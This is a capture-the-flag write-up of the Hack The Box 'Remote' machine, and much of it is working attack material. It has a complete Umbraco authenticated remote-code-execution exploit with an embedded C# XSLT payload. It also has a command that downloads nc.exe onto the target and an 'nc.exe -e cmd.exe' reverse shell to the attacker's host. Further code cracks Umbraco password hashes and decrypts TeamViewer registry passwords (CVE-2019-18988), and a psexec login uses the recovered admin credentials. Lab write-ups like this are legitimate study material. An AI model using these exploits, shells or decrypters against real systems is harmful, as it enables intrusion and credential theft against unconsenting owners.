
Hack The Box - Remote

From this write-up, I probably learnt that it is best to grab the screenshots and command outputs immediately, while you pwn the box, as your exploits may not work in the future. However, it did teach me not to blindly rely on online scripts to work perfectly every time, and I learnt how to fix them :)

Configuration

The operating system that I will be using to tackle this machine is a Kali Linux VM.

What I learnt from other write-ups is that it is a good habit to map a domain name to the machine’s IP address so that it is easier to remember. This can be done by appending a line to /etc/hosts.

$ echo "10.10.10.180 remote.htb" >> /etc/hosts

Reconnaissance

Using nmap, we are able to determine the open ports and running services on the machine.

$ nmap -sV -sT -sC remote.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-22 05:30 EDT
Nmap scan report for remote.htb (10.10.10.180)
Host is up (0.27s latency).
Not shown: 992 closed ports
PORT     STATE    SERVICE       VERSION
21/tcp   open     ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open     rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open     msrpc         Microsoft Windows RPC
139/tcp  open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open     microsoft-ds?
1119/tcp filtered bnetgame
2049/tcp open     mountd        1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m12s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-03-22T09:34:15
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 268.43 seconds

Enumeration (1)

Even though anonymous FTP login was allowed, there were no files on the FTP service on port 21 :( Moving on, we see an HTTP service running on port 80, so let’s check that out.

This website seems to be based on a web template, but let’s keep crawling around…

http://remote.htb/contact/:

On this page was a button that brought me to the login page of a content management system (CMS) called Umbraco!

We don’t have credentials to log in with, but I did find an exploit for this CMS that we can possibly use. It requires an authenticated user, though, so let’s keep it for later.

Going back to the scan results, we see a large chunk of rpcbind information from port 111, and below it an NFS/mountd service on port 2049.

Using showmount, we can list the NFS (Network File System) exports the server offers.

$ showmount -e remote.htb
Export list for remote.htb:
/site_backups (everyone)

The export is open to everyone, so let’s try mounting it on our machine:

$ mkdir /mnt/nfs
$ mount -t nfs -o vers=3 remote.htb:/site_backups /mnt/nfs

No output, but I guess it worked? Let’s see what’s inside!

$ cd /mnt/nfs
$ ls -al
total 123
drwx------ 2 4294967294 4294967294  4096 Aug 15 11:12 .
drwxr-xr-x 3 root       root        4096 Aug 16 15:15 ..
drwx------ 2 4294967294 4294967294    64 Feb 20 12:16 App_Browsers
drwx------ 2 4294967294 4294967294  4096 Feb 20 12:17 App_Data
drwx------ 2 4294967294 4294967294  4096 Feb 20 12:16 App_Plugins
drwx------ 2 4294967294 4294967294    64 Feb 20 12:16 aspnet_client
drwx------ 2 4294967294 4294967294 49152 Feb 20 12:16 bin
drwx------ 2 4294967294 4294967294  8192 Feb 20 12:16 Config
drwx------ 2 4294967294 4294967294    64 Feb 20 12:16 css
-rwx------ 1 4294967294 4294967294   152 Nov  1  2018 default.aspx
-rwx------ 1 4294967294 4294967294    89 Nov  1  2018 Global.asax
drwx------ 2 4294967294 4294967294  4096 Feb 20 12:16 Media
drwx------ 2 4294967294 4294967294    64 Feb 20 12:16 scripts
drwx------ 2 4294967294 4294967294  8192 Feb 20 12:16 Umbraco
drwx------ 2 4294967294 4294967294  4096 Feb 20 12:16 Umbraco_Client
drwx------ 2 4294967294 4294967294  4096 Feb 20 12:16 Views
-rwx------ 1 4294967294 4294967294 28539 Feb 20 00:57 Web.config

This looks like the web root of an Umbraco CMS install. Since these files could be a backup of the Umbraco instance that is currently running, let’s see if we can find any hard-coded configuration or credentials we can use.

Digging around, I found Umbraco.sdf under App_Data. Searching online, it turns out this is a SQL Server Compact database holding the contents of the Umbraco CMS, including its user table. Nice! The file is binary, but we can run strings on it and eyeball the output for anything that looks like a credential.

$ strings Umbraco.sdf | less
...
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
...

Alright, these look like Umbraco user records: username, e-mail, password hash and the hash algorithm used. Two accounts are of interest: admin@htb.local, whose hash is a plain SHA1, and ssmith@htb.local, whose value is a base64 salt followed by a base64 HMACSHA256 hash. HMACSHA256 is a keyed hash and we do not know how this installation derives the key, so we cannot crack it directly; an unsalted SHA1 hash, on the other hand, can simply be looked up online.
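As an added example (not part of the original write-up), here is an offline version of that lookup in Python. It pulls the user records out of the strings dump and tests the SHA1 rows against a wordlist. The fields in the dump have no separators, so the parser anchors on the {"hashAlgorithm":...} blob Umbraco stores beside each hash; the 24/44-character salt/hash lengths used to recognise HMACSHA256 rows are an assumption that holds for this dump. The sample dump lines and the mini wordlist are constructed from what is printed on this page.

```python
import hashlib
import re

# Constructed sample input: three of the `strings Umbraco.sdf` lines shown above,
# copied as printed. Each user row comes out of strings as one run-on line.
SDF_STRINGS = """\
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
"""

# The e-mail is repeated right after the JSON blob, followed by the culture
# "en-US", which is the only clean place to cut it out of the run-on line.
_EMAIL_AFTER = r'(?:([\w.+-]+@[\w.-]+?))?en-US'
# SHA1 rows: 40 hex chars directly in front of the JSON blob.
SHA1_RE = re.compile(r'([0-9a-f]{40})\{"hashAlgorithm":"SHA1"\}' + _EMAIL_AFTER)
# HMACSHA256 rows: base64(16-byte salt) then base64(32-byte hash) in front of
# the blob. Assumption: 24 + 44 base64 chars, which is what this dump shows.
HMAC_RE = re.compile(r'([A-Za-z0-9+/]{22}==)([A-Za-z0-9+/]{43}=)'
                     r'\{"hashAlgorithm":"HMACSHA256"\}' + _EMAIL_AFTER)


def parse_umbraco_users(dump):
    """Return one dict per user row found in a strings dump of Umbraco.sdf."""
    records = []
    for line in dump.splitlines():
        m = SHA1_RE.search(line)
        if m:
            records.append({"email": m.group(2), "algorithm": "SHA1",
                            "hash": m.group(1)})
            continue
        m = HMAC_RE.search(line)
        if m:
            records.append({"email": m.group(3), "algorithm": "HMACSHA256",
                            "salt": m.group(1), "hash": m.group(2)})
    return records


def crack_sha1(records, wordlist):
    """Offline equivalent of the crackstation lookup: unsalted SHA1 over the
    UTF-8 password bytes. HMACSHA256 rows are skipped on purpose, since the
    key derivation is unknown here and they cannot be attacked this way."""
    found = {}
    for rec in records:
        if rec["algorithm"] != "SHA1":
            continue
        for word in wordlist:
            if hashlib.sha1(word.encode("utf-8")).hexdigest() == rec["hash"]:
                found[rec["email"] or "<no e-mail>"] = word
    return found


# Constructed mini wordlist; a real run would feed rockyou.txt or similar.
WORDLIST = ["password", "admin", "Umbraco1", "baconandcheese"]

if __name__ == "__main__":
    users = parse_umbraco_users(SDF_STRINGS)
    for user in users:
        print(user)
    print(crack_sha1(users, WORDLIST))
```

Running it prints the three parsed records and the cracked mapping for the SHA1 rows; the ssmith row is parsed (salt and hash separated) but left alone.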

https://crackstation.net/ resolves the SHA1 hash straight away: baconandcheese. Let’s check whether baconandcheese is still in use for the admin@htb.local account.

After pressing “Login”, nothing appeared on the web page, but we know the login was successful. Remember the exploit we found earlier? Let’s see if it works with the credentials we found.

Exploitation

$ python umbraco.py -u 'admin@htb.local' -p 'baconandcheese' -i http://remote.htb -c cmd.exe -a "/c whoami"
Traceback (most recent call last):
  File "umbraco3.py", line 53, in <module>
    VIEWSTATE = soup.find(id="__VIEWSTATE")['value']

When I first pwned this box, this exploit was working fine! Fortunately, I was able to debug and realised that the new cookies set after successful logon were not being saved properly, so I tweaked the script a little:

# Exploit Title: Umbraco CMS - Authenticated Remote Code Execution 
# Date: 2020-03-28
# Exploit Author: Alexandre ZANNI (noraj)
# Based on: https://www.exploit-db.com/exploits/46153
# Vendor Homepage: http://www.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases
# Version: 7.12.4
# Category: Webapps
# Tested on: Windows IIS
# Example: python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c ipconfig

import requests
import re
import argparse
from http.cookies import SimpleCookie

from bs4 import BeautifulSoup

parser = argparse.ArgumentParser(prog='exploit.py',
    description='Umbraco authenticated RCE',
    formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=80))
parser.add_argument('-u', '--user', metavar='USER', type=str,
    required=True, dest='user', help='username / email')
parser.add_argument('-p', '--password', metavar='PASS', type=str,
    required=True, dest='password', help='password')
parser.add_argument('-i', '--host', metavar='URL', type=str, required=True,
    dest='url', help='root URL')
parser.add_argument('-c', '--command', metavar='CMD', type=str, required=True,
    dest='command', help='command')
parser.add_argument('-a', '--arguments', metavar='ARGS', type=str, required=False,
    dest='arguments', help='arguments', default='')
args = parser.parse_args()

# Payload
# Umbraco's XSLT visualizer compiles and runs the submitted stylesheet server-side.
# msxsl:script lets the stylesheet embed C#, so the transform simply spawns the
# requested process and returns its stdout into the rendered result. The two %s
# placeholders receive the -a arguments and the -c command, in that order.
payload = """\
<?xml version="1.0"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:csharp_user="http://csharp.mycompany.com/mynamespace"><msxsl:script language="C#" implements-prefix="csharp_user">public string xml() { string cmd = "%s"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "%s"; proc.StartInfo.Arguments = cmd; proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true;  proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; }  </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/> </xsl:template> </xsl:stylesheet>
""" % (args.arguments, args.command)

login = args.user
password = args.password
host = args.url

# Process Login
url_login = host + "/umbraco/backoffice/UmbracoApi/Authentication/PostLogin"
loginfo = { "username": login, "password": password}
s = requests.session()

# START OF MODIFIED SECTION
# The original posted the login through the session, but the cookies issued by
# PostLogin (UMB-XSRF-TOKEN among them, which the visualizer request needs) were
# not ending up in the session jar. Log in with a plain request instead, parse the
# Set-Cookie header by hand and copy every cookie into the session. Note that
# requests folds multiple Set-Cookie headers into a single comma-joined string.
# r2 = s.post(url_login,json=loginfo)
r2 = requests.post(url_login,json=loginfo)
cookie = SimpleCookie()
cookie.load(r2.headers["Set-Cookie"])

for key,value in cookie.items():
    cookie_obj = requests.cookies.create_cookie(name=key,value=value.value)
    s.cookies.set_cookie(cookie_obj)
# END OF MODIFIED SECTION


# Go to vulnerable web page
# The ASP.NET form needs the current __VIEWSTATE / __VIEWSTATEGENERATOR values and
# the back-office anti-forgery token, so fetch the page once and scrape them.
url_xslt = host + "/umbraco/developer/Xslt/xsltVisualize.aspx"
r3 = s.get(url_xslt)


soup = BeautifulSoup(r3.text, 'html.parser')
VIEWSTATE = soup.find(id="__VIEWSTATE")['value']
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value']
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN']
headers = {'UMB-XSRF-TOKEN': UMBXSRFTOKEN}
data = { "__EVENTTARGET": "", "__EVENTARGUMENT": "", "__VIEWSTATE": VIEWSTATE,
    "__VIEWSTATEGENERATOR": VIEWSTATEGENERATOR,
    "ctl00$body$xsltSelection": payload,
    "ctl00$body$contentPicker$ContentIdValue": "",
    "ctl00$body$visualizeDo": "Visualize+XSLT" }

# Launch the attack
r4 = s.post(url_xslt, data=data, headers=headers)

# print(r4.text)
# Filter output: the command output is rendered inside the element with id="result"
soup = BeautifulSoup(r4.text, 'html.parser')
CMDOUTPUT = soup.find(id="result").getText()
print(CMDOUTPUT)

Now, let’s test it out.

$ python umbraco.py -u 'admin@htb.local' -p 'baconandcheese' -i http://remote.htb -c cmd.exe -a "/c whoami"
iis apppool\defaultapppool

With RCE on the box, we can pull nc.exe onto it and get a reverse shell. The box has curl available, so we can fetch the binary from a Python HTTP server on our machine. Note the quadruple backslashes in the Windows paths: the -a argument is pasted into a C# string literal inside the XSLT payload, so each backslash has to survive both the shell’s double-quote escaping and C# string escaping.

$ python umbraco.py -u 'admin@htb.local' -p 'baconandcheese' -i http://remote.htb -c cmd.exe -a "/c mkdir C:\\\\tmp"

$ python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

$ python umbraco.py -u 'admin@htb.local' -p 'baconandcheese' -i http://remote.htb -c cmd.exe -a "/c curl http://10.10.XX.XX/nc.exe > C:\\\\tmp\\\\nc.exe"

$ nc -lvnp 1337
listening on [any] 1337 ...

$ python umbraco.py -u 'admin@htb.local' -p 'baconandcheese' -i http://remote.htb -c cmd.exe -a "/c C:\\\\tmp\\\\nc.exe -e cmd.exe 10.10.XX.XX 1337"

On our nc listener, we catch the reverse shell.

listening on [any] 1337 ...
connect to [10.10.XX.XX] from (UNKNOWN) [10.10.10.180] 49708
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
iis apppool\defaultapppool

user.txt

The current user has no home directory, so I had to resort to where (with /R to search recursively from the drive root) to find it.

c:\windows\system32\inetsrv> where /R C:\ user.txt
C:\Users\Public\user.txt
c:\windows\system32\inetsrv> type C:\Users\Public\user.txt
cf70XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Enumeration (2)

Let’s check what’s installed on the system.

c:\windows\system32\inetsrv> dir "C:\Program Files"
 Volume in drive C has no label.
 Volume Serial Number is BE23-EB3E

 Directory of C:\Program Files

02/23/2020  03:19 PM    <DIR>          .
02/23/2020  03:19 PM    <DIR>          ..
02/19/2020  04:04 PM    <DIR>          Common Files
09/15/2018  05:06 AM    <DIR>          internet explorer
02/23/2020  03:16 PM    <DIR>          Microsoft SQL Server
02/19/2020  04:11 PM    <DIR>          MSBuild
02/19/2020  04:11 PM    <DIR>          Reference Assemblies
02/19/2020  04:04 PM    <DIR>          VMware
02/20/2020  07:46 AM    <DIR>          Windows Defender
09/15/2018  05:05 AM    <DIR>          Windows Defender Advanced Threat Protection
09/15/2018  03:19 AM    <DIR>          Windows Mail
10/29/2018  06:39 PM    <DIR>          Windows Media Player
09/15/2018  03:19 AM    <DIR>          Windows Multimedia Platform
09/15/2018  03:28 AM    <DIR>          windows nt
10/29/2018  06:39 PM    <DIR>          Windows Photo Viewer
09/15/2018  03:19 AM    <DIR>          Windows Portable Devices
09/15/2018  03:19 AM    <DIR>          Windows Security
09/15/2018  03:19 AM    <DIR>          WindowsPowerShell
               0 File(s)              0 bytes
              18 Dir(s)  19,394,420,736 bytes free

c:\windows\system32\inetsrv> dir "C:\Program Files (x86)"
 Volume in drive C has no label.
 Volume Serial Number is BE23-EB3E

 Directory of C:\Program Files (x86)

02/23/2020  03:19 PM    <DIR>          .
02/23/2020  03:19 PM    <DIR>          ..
09/15/2018  03:28 AM    <DIR>          Common Files
09/15/2018  05:06 AM    <DIR>          Internet Explorer
02/23/2020  03:19 PM    <DIR>          Microsoft SQL Server
02/23/2020  03:15 PM    <DIR>          Microsoft.NET
02/19/2020  04:11 PM    <DIR>          MSBuild
02/19/2020  04:11 PM    <DIR>          Reference Assemblies
02/20/2020  03:14 AM    <DIR>          TeamViewer
09/15/2018  05:05 AM    <DIR>          Windows Defender
09/15/2018  03:19 AM    <DIR>          Windows Mail
10/29/2018  06:39 PM    <DIR>          Windows Media Player
09/15/2018  03:19 AM    <DIR>          Windows Multimedia Platform
09/15/2018  03:28 AM    <DIR>          windows nt
10/29/2018  06:39 PM    <DIR>          Windows Photo Viewer
09/15/2018  03:19 AM    <DIR>          Windows Portable Devices
09/15/2018  03:19 AM    <DIR>          WindowsPowerShell
               0 File(s)              0 bytes
              17 Dir(s)  19,394,396,160 bytes free

“TeamViewer”? This definitely seems worth looking into. Maybe there are saved passwords? I couldn’t find any config files containing saved passwords, so the other place where TeamViewer keeps its configuration is the registry.

c:\windows\system32\inetsrv> reg query HKLM /s /k /f "TeamViewer"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\TeamViewer 7
HKEY_LOCAL_MACHINE\SOFTWARE\TeamViewer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TeamViewerConfiguration
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TeamViewerSession
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TeamViewer7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\TeamViewer7
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TeamViewer7
End of search: 7 match(es) found

HKEY_LOCAL_MACHINE\SOFTWARE\TeamViewer seems promising, so let’s check that out. The interesting value turns up under the WOW6432Node\TeamViewer\Version7 key, which fits: TeamViewer 7 is a 32-bit application, which is also why it lives in Program Files (x86).

c:\windows\system32\inetsrv> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\TeamViewer" /s
...
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer\Version7
...
    SecurityPasswordAES    REG_BINARY    FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B
...

Seems like I was right! SecurityPasswordAES holds the stored unattended-access password, AES-encrypted with a key and IV that are hard-coded in the TeamViewer binary and identical in every installation (CVE-2019-18988, researched by @whynotsecurity), so it can be decrypted offline. Using a decrypter script based on that research (it links the write-up in its banner), I was able to retrieve the password.

$ python3 tv.py 

This is a quick and dirty Teamviewer password decrypter basis wonderful post by @whynotsecurity.
Read this blogpost if you haven't already : https://whynotsecurity.com/blog/teamviewer
 
Please check below mentioned registry values and enter its value manually without spaces.
"SecurityPasswordAES" OR "OptionsPasswordAES" OR "SecurityPasswordExported" OR "PermanentPassword"

Enter output from registry without spaces : FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B
Decrypted password is :  !R3m0te!
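As an added example, and not the script used above, here is a self-contained Python decrypter for that registry value. It implements AES-128 decryption itself so it runs without pycryptodome, and uses the static key/IV documented by @whynotsecurity (CVE-2019-18988). The padding handling (trailing zero bytes, with a PKCS#7 check in case a build ever uses it) is my assumption about how TeamViewer lays out the UTF-16LE password; the hex value is the one from the reg query output above.

```python
import binascii

# Static AES-128-CBC key and IV TeamViewer (from at least v7 through 14.7) used for
# the password values it writes to the registry; the same pair ships in every
# installation (CVE-2019-18988, researched by @whynotsecurity).
TV_KEY = binascii.unhexlify("0602000000a400005253413100040000")
TV_IV = binascii.unhexlify("0100010067244F436E6762F25EA8D704")
# Value copied from the reg query output above.
SECURITY_PASSWORD_AES = "FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B"

# AES-128 (decrypt direction only) in pure Python, so no crypto library is needed.

def _xtime(a):
    """Multiply by x in GF(2^8) modulo the AES polynomial x^8+x^4+x^3+x+1."""
    a <<= 1
    return (a ^ 0x11B) & 0xFF if a & 0x100 else a

def _gmul(a, b):
    """General GF(2^8) multiplication."""
    p = 0
    while b:
        if b & 1:
            p ^= a
        a, b = _xtime(a), b >> 1
    return p

def _build_sboxes():
    """S-box = affine transform of the GF(2^8) multiplicative inverse."""
    sbox = [0] * 256
    for a in range(256):
        inv = next((b for b in range(1, 256) if _gmul(a, b) == 1), 0)
        s = x = inv
        for _ in range(4):
            x = ((x << 1) | (x >> 7)) & 0xFF
            s ^= x
        sbox[a] = s ^ 0x63
    inv_sbox = [0] * 256
    for i, v in enumerate(sbox):
        inv_sbox[v] = i
    return sbox, inv_sbox

SBOX, INV_SBOX = _build_sboxes()

def _expand_key(key):
    """AES-128 key schedule: 16-byte key -> 11 round keys of 16 bytes."""
    w = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    rcon = 1
    for i in range(4, 44):
        t = w[i - 1][:]
        if i % 4 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]  # RotWord + SubWord
            t[0] ^= rcon
            rcon = _xtime(rcon)
        w.append([a ^ b for a, b in zip(w[i - 4], t)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(11)]

def _inv_shift_rows(s):
    # State is column-major: index r + 4*c is row r, column c.
    out = s[:]
    for r in range(1, 4):
        for c in range(4):
            out[r + 4 * ((c + r) % 4)] = s[r + 4 * c]
    return out

def _inv_mix_columns(s):
    out = []
    for c in range(4):
        a0, a1, a2, a3 = s[4 * c:4 * c + 4]
        out += [_gmul(a0, 14) ^ _gmul(a1, 11) ^ _gmul(a2, 13) ^ _gmul(a3, 9),
                _gmul(a0, 9) ^ _gmul(a1, 14) ^ _gmul(a2, 11) ^ _gmul(a3, 13),
                _gmul(a0, 13) ^ _gmul(a1, 9) ^ _gmul(a2, 14) ^ _gmul(a3, 11),
                _gmul(a0, 11) ^ _gmul(a1, 13) ^ _gmul(a2, 9) ^ _gmul(a3, 14)]
    return out

def _decrypt_block(block, rk):
    """FIPS-197 InvCipher for one 16-byte block."""
    s = [b ^ k for b, k in zip(block, rk[10])]
    for rnd in range(9, 0, -1):
        s = [INV_SBOX[b] for b in _inv_shift_rows(s)]
        s = _inv_mix_columns([b ^ k for b, k in zip(s, rk[rnd])])
    s = [INV_SBOX[b] for b in _inv_shift_rows(s)]
    return bytes(b ^ k for b, k in zip(s, rk[0]))

def aes128_cbc_decrypt(key, iv, data):
    rk, out, prev = _expand_key(key), bytearray(), iv
    for i in range(0, len(data), 16):
        blk = data[i:i + 16]
        out += bytes(p ^ c for p, c in zip(_decrypt_block(blk, rk), prev))
        prev = blk
    return bytes(out)

def decrypt_teamviewer_password(reg_hex):
    """Decrypt a SecurityPasswordAES / OptionsPasswordAES / PermanentPassword
    REG_BINARY value, given as the hex string reg query prints."""
    plain = aes128_cbc_decrypt(TV_KEY, TV_IV, binascii.unhexlify(reg_hex.replace(" ", "")))
    pad = plain[-1] if plain else 0
    if 1 <= pad <= 16 and plain.endswith(bytes([pad]) * pad):
        plain = plain[:-pad]  # PKCS#7-style padding, if a build ever uses it
    # Assumption: the password is UTF-16LE, zero-padded up to the block size.
    return plain.decode("utf-16-le", errors="replace").rstrip("\x00")

if __name__ == "__main__":
    print("Decrypted password is :", decrypt_teamviewer_password(SECURITY_PASSWORD_AES))
```

Run it as-is to recover the password from the value above; any other hex value copied from reg query (OptionsPasswordAES, PermanentPassword) can be passed to decrypt_teamviewer_password the same way. Building the S-box by brute-force inversion takes well under a second and keeps the block free of typed-in tables.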

root.txt

With !R3m0te!, let’s check whether the Administrator account reuses the TeamViewer password. psexec.py needs a writable ADMIN$ share to drop its service binary, so if it hands us a shell the credentials are confirmed as local admin.

$ python psexec.py 'Administrator:!R3m0te!@remote.htb'
Impacket v0.9.22.dev1+20200713.100928.1e84ad60 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on remote.htb.....
[*] Found writable share ADMIN$
[*] Uploading file FNFPcETB.exe
[*] Opening SVCManager on remote.htb.....
[*] Creating service xGXs on remote.htb.....
[*] Starting service xGXs.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
baceXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Rooted! Thank you for reading, and look out for more write-ups and articles!

This post is licensed under CC BY 4.0 by the author.